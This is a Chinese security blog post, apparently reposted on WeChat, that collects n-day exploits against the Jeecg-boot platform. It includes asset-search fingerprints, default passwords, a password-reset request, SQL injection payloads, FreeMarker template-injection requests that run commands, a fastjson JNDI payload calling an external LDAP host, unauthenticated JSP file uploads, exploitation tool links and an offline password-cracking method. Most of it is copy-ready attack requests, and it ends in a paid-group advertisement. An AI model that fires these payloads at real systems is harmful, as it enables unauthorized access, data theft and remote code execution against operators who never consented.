分享Jeecg-boot中的Nday漏洞汇总打法

原文链接: https://mp.weixin.qq.com/s?__biz=Mzk0Mzc1MTI2Nw==&mid=2247492761&idx=1&sn=74dceba6e96dc5542167e58b17b22472

分享Jeecg-boot中的Nday漏洞汇总打法

zm 神农Sec 2025-07-08 01:00

扫码加圈子

获内部资料

分享Jeecg-boot中的Nday漏洞汇总打法

分享Jeecg-boot中的Nday漏洞汇总打法

网络安全领域各种资源,EDUSRC证书站挖掘、红蓝攻防、渗透测试等优质文章,以及工具分享、前沿信息分享、POC、EXP分享。
不定期分享各种好玩的项目及好用的工具,欢迎关注。加内部圈子,文末有彩蛋(知识星球优惠卷)。

文章作者:zm

文章来源:https://www.freebuf.com/articles/web/436956.html

分享Jeecg-boot常见漏洞汇总

前言

jeecg-boot漏洞笔记记录一下,大佬勿喷。

小白可以直接收藏下来学习一下很多poc我都直接给出来了,基本就是我的笔记。

如果,有不对的可以指正一下,一起学习。

jeecg-boot介绍

官网地址:
https://jeecg.com
开源项目地址:
https://github.com/zhangdaiscott/jeecg-boot

1751073890_685f446203ce33ac739d0.png!small

资产测绘

fofa:
body=”/sys/common/pdf/pdfPreviewIframe”

title=”Jeecg-Boot 快速开发平台” || body=”积木报表”

body=”jeecg-boot”

app=”JEECG”

icon_hash=”1380908726″

icon_hash=”-250963920″

1751074165_685f457555c409dcd6741.png!small?1751074165285

常见情况

加载动画

1751074465_685f46a153dfa564857d2.png!small?1751074465213

1751074352_685f463098ada0ee7f739.png!small?1751074352654

1751074496_685f46c03fc59e5f87987.png!small?1751074496168

出现一下这几种情况基本可以确定是jeecg-boot,也可以通过接口或者图标等信息进行判定。

常见弱口令漏洞

admin/123456
jeecg/123456
admn/admin
test/test
demo/test
jeecg/jeecg123456
guest/guest

1751076190_685f4d5e730f2eaae1882.png!small?1751076190863

JeecgBoot passwordChange接口任意用户密码重置

GET /jeecg-boot/sys/user/passwordChange?username=admin&password=admin&smscode=&phone= HTTP/1.1

Host: 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0

Accept: /

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate, br

Connection: keep-alive

jeecg-boot-checkOnlyUser信息泄露漏洞

/jeecg-boot/sys/user/querySysUser?username=admin

Jeecg-Boot 2.4.5及之前版本存在不安全权限漏洞。攻击者可利用该漏洞通过uri:/sys/user/checkOnlyUser?username=admin提升权限并查看敏感信息。

jeecg-boot-目录遍历漏洞

/jeecg-boot/online/cgform/head/fileTree?_t=1632524014&parentPath=/

低权限账号访问直接返回服务器文件目录信息

Jeecg-boot 3.4.4 /sys/dict/queryTableData SQL注入

在Jeecg-boot 3.4.4中曾发现分类为致命的漏洞。 此漏洞会影响未知代码文件/sys/dict/queryTableData。 手动调试的不合法输入可导致 SQL注入。

POST /jeecg-boot/jmreport/qurestSql HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.29 Safari/525.13

Content-Type: application/json; charset=utf-8

Content-Length: 127

Host: 

Connection: close

Accept-Encoding: gzip, deflate

{“apiSelectId”:”1316997232402231298″,”id”:”1′ or ‘%1%’ like (updatexml(0x3a,concat(1,(select md5(123456))),1)) or ‘%%’ like ‘”}

JeecgBoot onlDragDatasetHead/getTotalData SQL注入

JeecgBoot v3.7.1 通过组件 /onlDragDatasetHead/getTotalData 存在 SQL 注入漏洞。

POST /jeecg-boot/drag/onlDragDatasetHead/getTotalData HTTP/2

Host: 

Accept-Encoding: gzip, deflate

Accept: /

Accept-Language: en-US;q=0.9,en;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36

Content-Type: application/json

Content-Length: 281

{“tableName”:”sys_user”,”compName”:”test”,”condition”:{“filter”:{}},”config”:{“assistValue”:[],”assistType”:[],”name”:[{“fieldName”:”concat(0x7e,version(),0x7e)”,”fieldType”:”string”},{“fieldName”:”id”,”fieldType”:”string”}],”value”:[{“fieldName”:”id”,”fieldType”:”1″}],”type”:[]}}

jeecg-boot-getDictItemsByTable SQL注入漏洞

JeecgBoot是一款基于代码生成器的低代码开发平台,它专为简化Java项目开发流程、提高开发效率而设计。攻击者通过注入恶意的SQL代码,能够窃取、篡改或删除数据库中的数据,甚至执行系统命令,对网站和服务器造成严重影响。

GET /jeecg-boot/sys/ng-alain/getDictItemsByTable/’%20from%20sys_user/*,%20’/x.js HTTP/1.1

Host: 

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0

Accept: /

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate, br

Sec-Purpose: prefetch

Connection: close

Priority: u=6

Jeecg-Boot /jmreport/show SQL注入漏洞

jeecg-boot 3.5.0和3.5.1 版本存在安全漏洞,该漏洞源于 /jeecg-boot/jmreport/show 接口的 id 参数存在SQL注入漏洞。

POST /jeecg-boot/jmreport/show HTTP/1.1

Host: 

User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36

Connection: close

Content-Length: 182

Content-Type: application/json;charset=UTF-8

Accept-Encoding: gzip

{

“id”: “961455b47c0b86dc961e90b5893bff05”,

“apiUrl”: “”,

“params”: {

“id “: “1 ‘ or ‘ % 1 % ‘ like (updatexml(0x3a,concat(1,(version())),1)) or ‘ % % ‘ like ‘”

}

}

jeecg-boot sys/duplicate/check SQL注入

/sys/duplicate/check 接口SQL注入,checksql可以被绕过,该漏洞需要进行身份认证。

GET /jeecg-boot/sys/duplicate/check?tableName=v3_hello&fieldName=1+and%09if(user(%20)=’root@localhost’,sleep(0),sleep(0))&fieldVal=1&dataId=asd HTTP/1.1

Host: 

Accept-Encoding: gzip, deflate

Accept: /

Accept-Language: en-US;q=0.9,en;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36

Connection: close

Cache-Control: max-age=0

X_ACCESS_TOKEN: eyJ0eXAi0iJKV1QiLCJhbGci0iJIUzI1Ni J9.eyJleHAi0jE2NzA2NjUy0TQsInVzZXJ uYW1lIjoiYWRtaW4i fQ.bL0e7k3rbFEewdMoL2YfPCo9rtzx7g9 KLjB2LK-J9SU

GET /jeecg-boot/sys/duplicate/check?tableName=sys_log&fieldName=1+and%09if(user(%20)=’root@localhost’,sleep(0),sleep(10))&fieldVal=1000&dataId=2000 HTTP/1.1

Host: 

Accept-Encoding: gzip, deflate

Accept: /

Accept-Language: en-US;q=0.9,en;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36

Connection: close

Cache-Control: max-age=0

X_ACCESS_TOKEN: eyJ0eXAi0iJKV1QiLCJhbGci0iJIUzI1Ni J9.eyJleHAi0jE2NzA2NjUy0TQsInVzZXJ uYW1lIjoiYWRtaW4i fQ.bL0e7k3rbFEewdMoL2YfPCo9rtzx7g9 KLjB2LK-J9SU

JeecgBoot jmreport/loadTableData SSTI模板注入漏洞

jeecg-boot 版本 3.5.3 中的 SSTI 注入漏洞允许远程攻击者通过对 /jmreport/loadTableData 组件进行精心设计的 HTTP 请求执行任意代码。

POST /jeecg-boot/jmreport/loadTableData HTTP/1.1

Host: 

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0

Accept: application/json, text/plain, /

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/json;charset=UTF-8

X-Sign: AD0488642A880C68C8E3551C3BE0F6F5

X-TIMESTAMP: 1699726206096

X-Access-Token: null

token: null

JmReport-Tenant-Id: null

Content-Length: 167

Connection: close

Cookie: Hm_lvt_5819d05c0869771ff6e6a81cdec5b2e8=1699726144; Hm_lpvt_5819d05c0869771ff6e6a81cdec5b2e8=1699726162

{“dbSource”:””,”sql”:”select ‘<#assign value=\”freemarker.template.utility.Execute\”?new()>${value(\”whoami\”)}'”,”tableName”:”test_demo);”,”pageNo”:1,”pageSize”:10}

JeecgBoot AviatorScript表达式注入

积木报表软件存在AviatorScript代码注入RCE漏洞。使用接口/jmreport/save处在text中写入AviatorScript表达式。访问/jmreport/show触发AviatorScript解析从而导致命令执行。

POST /jeecg-boot/jmreport/queryFieldBySql?previousPage=xxx&jmLink=YWFhfHxiYmI=&token=123 HTTP/1.1

Host: 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0

Accept: application/json, text/plain, /

Content-Type: application/json

Content-Length: 108

{“sql”:”select ‘result:<#assign ex=\”freemarker.template.utility.Execute\”?new()> ${ex(\”whoami \”) }'” 

}

jeecg-boot后台/sysMessageTemplate/sendMsg接口freemaker模板注入

jeecg-boot的Freemarker模板注入导致远程命令执行, 远程攻击者可利用该漏洞调用在系统上执行任意命令。

1、添加一个测试模板

POST /jeecg-boot/sys/message/sysMessageTemplate/add HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0

Accept: application/json, text/plain, /

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate, br

X-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE3MzYyMTcyNDQsInVzZXJuYW1lIjoiYWRtaW4ifQ.-Z6FINUMTWQkOR6u009cde9BFyb-l65VWRhUXDz_2ao

Tenant-Id: 0

Sec-Fetch-Dest: empty

Sec-Fetch-Mode: cors

Sec-Fetch-Site: cross-site

Priority: u=0

Te: trailers

Connection: close

Content-Type: application/json;charset=UTF-8

Content-Length: 141

{“templateType”:”1″,”templateCode”:”5″,”templateName”:”test111″,”templateContent”:”${\”freemarker.template.utility.Execute\”?new()(\”id\”)}”}

2、发送模板

POST /jeecg-boot/sys/message/sysMessageTemplate/sendMsg HTTP/1.1

Host: 

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0

Accept: application/json, text/plain, /

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate, br

X-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE3MzYyMTcyNDQsInVzZXJuYW1lIjoiYWRtaW4ifQ.-Z6FINUMTWQkOR6u009cde9BFyb-l65VWRhUXDz_2ao

Tenant-Id: 0

Sec-Fetch-Dest: empty

Sec-Fetch-Mode: cors

Sec-Fetch-Site: cross-site

Priority: u=0

Te: trailers

Connection: close

Content-Type: application/json;charset=UTF-8

Content-Length: 64

{“templateCode”:”5″,”testData”:”{}”,”receiver”:””,”msgType”:”1″}

3、执行模板并查看返回结果

GET /jeecg-boot/sys/message/sysMessage/list?_t=1732776144&column=createTime&order=desc&field=id,,,esTitle,esContent,esReceiver,esSendNum,esSendStatus_dictText,esSendTime,esType_dictText,action&pageNo=1&pageSize=10 HTTP/1.1

Host:

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0

Accept: application/json, text/plain, /

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate, br

X-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE3MzYyMTcyNDQsInVzZXJuYW1lIjoiYWRtaW4ifQ.-Z6FINUMTWQkOR6u009cde9BFyb-l65VWRhUXDz_2ao

Tenant-Id: 0

Sec-Fetch-Dest: empty

Sec-Fetch-Mode: cors

Sec-Fetch-Site: cross-site

Priority: u=0

Te: trailers

Connection: close

Accept-Encoding: gzip

Jeecg-jeecgFormDemoController存在JNDI代码执行漏洞

JEECG 4.0 及之前版本中,由于 /api 接口鉴权时未过滤路径遍历,攻击 者可构造包含 ../ 的 url 绕过鉴权。 因为依赖 1.2.31 版本的 fastjson, 该版本存在反序列化漏洞。攻击者可对

/api/../jeecgFormDemoController.do?interfaceTest 接口进行 jndi 注入攻 击实现远程代码执行。

POST /api/../jeecgFormDemoController.do?interfaceTest= HTTP/1.1

Host: 

Pragma: no-cache

Cache-Control: no-cache

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7

Accept-Encoding: gzip, deflate, br

cmd: whoami

Accept-Language: zh-CN,zh;q=0.9

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 77

serverUrl=http://xxxxxxxx:8877/jeecg.txt&requestBody=1&requestMethod=GET

创建如下远程文件,其内容为fastjson代码执行的payload

{

“a”:{

“@type”:”java.lang.Class”,

“val”:”com.sun.rowset.JdbcRowSetImpl”

},

“b”:{

“@type”:”com.sun.rowset.JdbcRowSetImpl”,

“dataSourceName”:”ldap://10.66.64.89:1389/8orsiq”,

“autoCommit”:true

}

}

jeecg-boot/jmreport/upload接口存在未授权任意文件上传

测试发现/jeecg-boot/jmreport/upload接口存在未授权任意文件上传,经实测发现上传接口未授权,但访问上传后的文件需要登录,即带token。

POST /jeecg-boot/jmreport/upload HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)

Accept: /

Accept-Language: zh-CN,zh;q=0.9

Connection: close

Content-Type: multipart/form-data; boundary=—-WebKitFormBoundaryyfyhSCMs9cajzFD4

Cache-Control: no-cache

Pragma: no-cache

Host: 

Content-Length: 1476

——WebKitFormBoundaryyfyhSCMs9cajzFD4

Content-Disposition: form-data; name=”file”; filename=”11111.txt”

Content-Type: text/html

<%! 1111>

——WebKitFormBoundaryyfyhSCMs9cajzFD4

Content-Disposition: form-data; name=”fileName”

11111.txt

——WebKitFormBoundaryyfyhSCMs9cajzFD4

Content-Disposition: form-data; name=”biz”

excel_online

——WebKitFormBoundaryyfyhSCMs9cajzFD4–

Jeecg-commonController.do文件上传

由于 /api 接口鉴权时未过滤路径遍历,攻击者可构造包含 ../ 的url绕过鉴权。攻击者可构造恶意请求利用 commonController 接口进行文件上传攻击实现远程代码执行。

POST /jeecg-boot/api/../commonController.do?parserXml HTTP/1.1

Host:

Accept-Encoding: gzip, deflate

Content-Length: 360

User-Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95

Content-Type: multipart/form-data; boundary=—-WebKitFormBoundarygcflwtei

Connection: close

——WebKitFormBoundarygcflwtei

Content-Disposition: form-data; “name=”name”

zW9YCa.png

——WebKitFormBoundarygcflwtei

ontent-Disposition: form-data; name=”documentTitle”

blank

——WebKitFormBoundarygcflwtei

Content-Disposition: form-data; name=”file”; filename=”zW9YCa.jsp”

Content-Type: image/png

11111

——WebKitFormBoundarygcflwtei–

常见jeecg-boot常见接口

/v2/api-docs

/jeecg-boot/online/cgform/head/fileTree?_t=1632524014&parentPath=/

/jeecg-boot/sys/user/querySysUser?username=admin

/jeecg/

/api/sys/

/sys/user

/v2/api-docs

/swagger-ui.html

/env

/actuator

/mappings

/metrics

/beans

/configprops

/actuator/metrics

/actuator/mappings

/actuator/beans

/actuator/configprops

/actuator/httptrace

/druid/index.html

/druid/sql.html

/druid/weburi.html

/druid/websession.html

/druid/weburi.json

/druid/websession.json

/druid/login.html

/api/config/list

/sys/user/list

/sys/user/add

/sys/user/edit

/sys/user/queryById

/sys/user/changePassword

/sys/role/list

/sys/role/add

/sys/role/edit

/sys/role/queryPermission

/v2/api-docs

/v1/api-docs

/api-docs

/sys/menu/list

/sys/menu/add

/sys/menu/edit

/sys/menu/delete

/sys/depart/list

/sys/depart/add

/sys/depart/edit

/sys/depart/delete

/online/cgform/list

/online/cgform/add

/online/cgform/edit

/online/cgform/delete

/online/cgform/fields/{tableName}

/online/cgform/table/list

/online/cgform/table/sync

/online/cgform/generateCode

/sys/dict/list

/sys/dict/add

/sys/dict/edit

/sys/dict/delete

/act/process/list

/act/process/deploy

/act/task/list

/act/task/complete

/act/task/history

/sys/common/upload

/sys/common/download/{fileId}

/sys/common/view/{fileId}

/monitor/redis/info

/monitor/server/info

/api/test/demo/list

/api/test/demo/add

/sys/log/list

/sys/log/delete

/sys/sms/send

/sys/sms/list

/api/test/demo/edit

/api/test/demo/delete

/report/loadReport/{code}

/chart/api/getChartData

/api/test/demo/queryById

/act/process/delete

/sys/dict/loadDictItems/{dictCode}

/jeecg-boot/sys/getLoginQrcode

/jeecg-boot/sys/getQrcodeToken

/jeecg-boot/sys/login

/jeecg-boot/sys/phoneLogin

/jeecg-boot/sys/scanLoginQrcode

/jeecg-boot/drag/onlDragDataSource/add

/jeecg-boot/drag/onlDragDataSource/delete

/jeecg-boot/drag/onlDragDataSource/deleteBatch

/jeecg-boot/drag/onlDragDataSource/edit

/jeecg-boot/drag/onlDragDataSource/list

/jeecg-boot/drag/onlDragDataSource/queryById

/jeecg-boot/drag/onlDragDatasetHead/add

/jeecg-boot/drag/onlDragDatasetHead/addGroup

/jeecg-boot/drag/onlDragDatasetHead/delDragDataSetHeadGroup

/jeecg-boot/drag/onlDragDatasetHead/delete

/jeecg-boot/drag/onlDragDatasetHead/edit

/jeecg-boot/drag/onlDragDatasetHead/queryById

/jeecg-boot/drag/onlDragDatasetHead/updateGroup

/jeecg-boot/drag/onlDragDatasetParam/add

/jeecg-boot/drag/onlDragDatasetParam/delete

/jeecg-boot/druid/login.html

/jeecg-boot/drag/onlDragDatasetParam/deleteBatch

/jeecg-boot/drag/onlDragDatasetParam/edit

/jeecg-boot/actuator/httptrace

/jeecg-boot/drag/onlDragDatasetParam/list

/jeecg-boot/drag/onlDragDatasetParam/queryById

/jeecg-boot/drag/websocket/sendData

/jeecg-boot/sys/checkRule/add

/jeecg-boot/sys/checkRule/checkByCode

/jeecg-boot/sys/checkRule/delete

/jeecg-boot/sys/checkRule/deleteBatch

/jeecg-boot/sys/checkRule/edit

/jeecg-boot/sys/checkRule/list

/jeecg-boot/sys/checkRule/queryById

/jeecg-boot/sys/comment/add

/jeecg-boot/sys/comment/addFile

/jeecg-boot/sys/comment/addText

/jeecg-boot/sys/comment/delete

/jeecg-boot/sys/comment/deleteBatch

/jeecg-boot/sys/comment/deleteOne

/jeecg-boot/sys/comment/edit

/jeecg-boot/sys/comment/fileList

/jeecg-boot/sys/comment/list

/jeecg-boot/sys/comment/listByForm

/jeecg-boot/sys/comment/queryById

/jeecg-boot/sys/dataSource/add

/jeecg-boot/sys/dataSource/delete

/jeecg-boot/sys/dataSource/deleteBatch

/jeecg-boot/sys/dataSource/edit

/jeecg-boot/sys/dataSource/list

/jeecg-boot/sys/dataSource/queryById

/jeecg-boot/sys/dictItem/dictItemCheck

/jeecg-boot/sys/duplicate/check

/jeecg-boot/sys/files/add

/jeecg-boot/sys/files/delete

/jeecg-boot/sys/files/deleteBatch

/jeecg-boot/sys/files/edit

/jeecg-boot/sys/files/list

/jeecg-boot/sys/files/queryById

/jeecg-boot/sys/fillRule/add

/jeecg-boot/sys/fillRule/delete

/jeecg-boot/sys/fillRule/deleteBatch

/jeecg-boot/sys/fillRule/edit

/jeecg-boot/sys/fillRule/list

/jeecg-boot/sys/fillRule/queryById

/jeecg-boot/sys/formFile/add

/jeecg-boot/sys/formFile/delete

/jeecg-boot/sys/formFile/deleteBatch

/jeecg-boot/sys/formFile/edit

/jeecg-boot/sys/formFile/list

/jeecg-boot/sys/formFile/queryById

/jeecg-boot/sys/position/add

/jeecg-boot/sys/position/delete

/jeecg-boot/sys/position/deleteBatch

/jeecg-boot/sys/position/edit

/jeecg-boot/sys/position/list

/jeecg-boot/sys/position/queryByCode

/jeecg-boot/sys/position/queryById

/jeecg-boot/sys/quartzJob/pause

/jeecg-boot/sys/quartzJob/resume

/jeecg-boot/sys/randomImage/

/jeecg-boot/sys/sysDepartPermission/add

/jeecg-boot/sys/sysDepartPermission/delete

/jeecg-boot/sys/sysDepartPermission/deleteBatch

/jeecg-boot/sys/sysDepartPermission/edit

/jeecg-boot/sys/sysDepartPermission/list

/jeecg-boot/sys/sysDepartPermission/queryById

/jeecg-boot/sys/sysDepartRole/add

/jeecg-boot/sys/sysDepartRole/delete

/jeecg-boot/sys/sysDepartRole/deleteBatch

/jeecg-boot/sys/sysDepartRole/edit

/jeecg-boot/sys/sysDepartRole/list

/jeecg-boot/sys/sysDepartRole/queryById

/jeecg-boot/sys/sysRoleIndex/add

/jeecg-boot/sys/sysRoleIndex/delete

/jeecg-boot/sys/sysRoleIndex/deleteBatch

/jeecg-boot/sys/sysRoleIndex/edit

/jeecg-boot/sys/sysRoleIndex/list

/jeecg-boot/sys/sysRoleIndex/queryByCode

/jeecg-boot/sys/sysRoleIndex/queryById

/jeecg-boot/test/dynamic/test1

/jeecg-boot/test/jeecgDemo/add

/jeecg-boot/test/jeecgDemo/delete

/jeecg-boot/test/jeecgDemo/deleteBatch

/jeecg-boot/test/jeecgDemo/edit

/jeecg-boot/test/jeecgDemo/list

/jeecg-boot/test/jeecgDemo/queryById

/sys/user/delete

/jeecg-boot/sys/user/addSysUserRole

/sys/role/delete

/user/register

常见jeecg-boot漏洞利用工具

https://github.com/Framework-vulnerability-tool/jeecg

工具介绍

jeecg综合漏洞利用工具,程序采用javafx开发,环境JDK 1.8 声明:仅用于授权测试,用户滥用造成的一切后果和作者无关 请遵守法律法规! 漏洞收录如下:

jeecg-boot queryFieldBySql远程命令执行漏洞

jeecg-boot testConnection远程命令执行漏洞

JeecgBoot jmreport/loadTableData SSTI模板注入漏洞

jeecg-boot-queryTableData-sqli注入漏洞

jeecg-boot-getDictItemsByTable-sqli注入漏洞

Jeecg-Boot qurestSql-SQL注入漏洞

jeecg-boot commonController 任意文件上传漏洞

jeecg-boot jmreport任意文件上传漏洞

jeecg-boot-querySysUser信息泄露漏洞

jeecg-boot-checkOnlyUser信息泄露漏洞

jeecg-boot-httptrace信息泄露漏洞

jeecg-boot-任意文件下载漏洞

jeecg-boot-jeecgFormDemoController漏洞

jeecg-boot-v2 P3 Biz Chat任意文件读取漏洞

jeecg-boot-v2 sys/duplicate/check注入漏洞

jeecg-boot-v2 AviatorScript表达式注入漏洞

1751075977_685f4c89a3ddfff507016.png!small?1751075977796

有时候我们检测到了sql注入漏洞但是无法getshell,可以另辟蹊径,直接读取密码文件然后进行解密。

https://github.com/ssrsec/JeecgBoot-offline-brute
有sqli的端点,但是无法rce以及进一步获得权限,我们可以尝试通过sqli获取凭据从而获得用户级权限
数据库中

password

字段是加密的,通过查看源码发现密码使用PBE进行加密,关键是用明文密码作为对称加密key的一个环节,所以没办法直接逆向解密,但是可以离线爆破。

1751076706_685f4f62e6a2fbd3ea825.png!small?1751076707181

1751076790_685f4fb6870fcd503d064.png!small?1751076791078

1751076815_685f4fcf627fac22a8605.png!small?1751076815671

实现过程

过程非常简单,直接捞出加密过程,然后通过sqli将数据库中的

用户名

加密后的密码

salt

取出来,然后直接用字典跑就行~

先取出对应的数据,放到根目录下的

data.json

,然后准备一个字典,放到根目录下的

pass.txt

1751076917_685f5035d5ee244d2f0d3.png!small?1751076918516

1751076938_685f504a3096e14cc57a7.png!small?1751076938439

java -jar JeecgBoot-offline-brute.jar

1751077062_685f50c6bdf487fa91563.png!small?1751077063418

内部小圈子详情介绍

我们是
神农安全
,点赞 + 在看
 铁铁们点起来,最后祝大家都能心想事成、发大财、行大运。

分享Jeecg-boot中的Nday漏洞汇总打法

分享Jeecg-boot中的Nday漏洞汇总打法

内部圈子介绍

分享Jeecg-boot中的Nday漏洞汇总打法

圈子专注于更新src/红蓝攻防相关:

1、维护更新src专项漏洞知识库,包含原理、挖掘技巧、实战案例
2、知识星球专属微信“小圈子交流群”
3、微信小群一起挖洞
4、内部团队专属EDUSRC证书站漏洞报告
5、分享src优质视频课程(企业src/EDUSRC/红蓝队攻防)
6、分享src挖掘技巧tips
7、不定期有众测、渗透测试项目(一起挣钱)
8、不定期有工作招聘内推(工作/护网内推)
9、送全国职业技能大赛环境+WP解析(比赛拿奖)

内部圈子
专栏介绍

知识星球内部共享资料截屏详情如下

(只要没有特殊情况,每天都保持更新)

分享Jeecg-boot中的Nday漏洞汇总打法

分享Jeecg-boot中的Nday漏洞汇总打法

知识星球——
神农安全

星球现价 
¥45元

如果你觉得应该加入,就不要犹豫,价格只会上涨,不会下跌

星球人数少于900人 45元/年

星球人数少于1000人 60元/年

(新人优惠卷20,扫码或者私信我即可领取)

分享Jeecg-boot中的Nday漏洞汇总打法

欢迎加入星球一起交流,券后价仅45元!!! 即将满900人涨价

长期
更新,更多的0day/1day漏洞POC/EXP

内部知识库–
(持续更新中)

分享Jeecg-boot中的Nday漏洞汇总打法

知识库部分大纲目录如下:

知识库跟
知识星球联动,基本上每天保持
更新,满足圈友的需求

分享Jeecg-boot中的Nday漏洞汇总打法

知识库和知识星球有师傅们关注的
EDUSRC

CNVD相关内容(内部资料)

分享Jeecg-boot中的Nday漏洞汇总打法

还有网上流出来的各种
SRC/CTF等课程视频

量大管饱,扫描下面的知识星球二维码加入即可

分享Jeecg-boot中的Nday漏洞汇总打法

不会挖CNVD?不会挖EDURC?不会挖企业SRC?不会打nday和通杀漏洞?

直接加入我们小圈子:
知识星球+内部圈子交流群+知识库

快来吧!!

图片

图片

神农安全知识库内部配置很多
内部工具和资料💾,
玄机靶场邀请码+EDUSRC邀请码等等

分享Jeecg-boot中的Nday漏洞汇总打法

快要护网来临,是不是需要
护网面试题汇总

问题+答案(超级详细🔎)

分享Jeecg-boot中的Nday漏洞汇总打法

最后,师傅们也是希望找个
好工作,那么常见的
渗透测试/安服工程师/驻场面试题目,你值得拥有!!!

分享Jeecg-boot中的Nday漏洞汇总打法

内部小圈子——
圈友反馈

良心价格

分享Jeecg-boot中的Nday漏洞汇总打法

分享Jeecg-boot中的Nday漏洞汇总打法


神农安全公开交流群

有需要的师傅们直接扫描文章二维码加入,然后要是后面群聊二维码扫描加入不了的师傅们,直接扫描文章开头的二维码加我(备注加群)

分享Jeecg-boot中的Nday漏洞汇总打法

申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

分享Jeecg-boot中的Nday漏洞汇总打法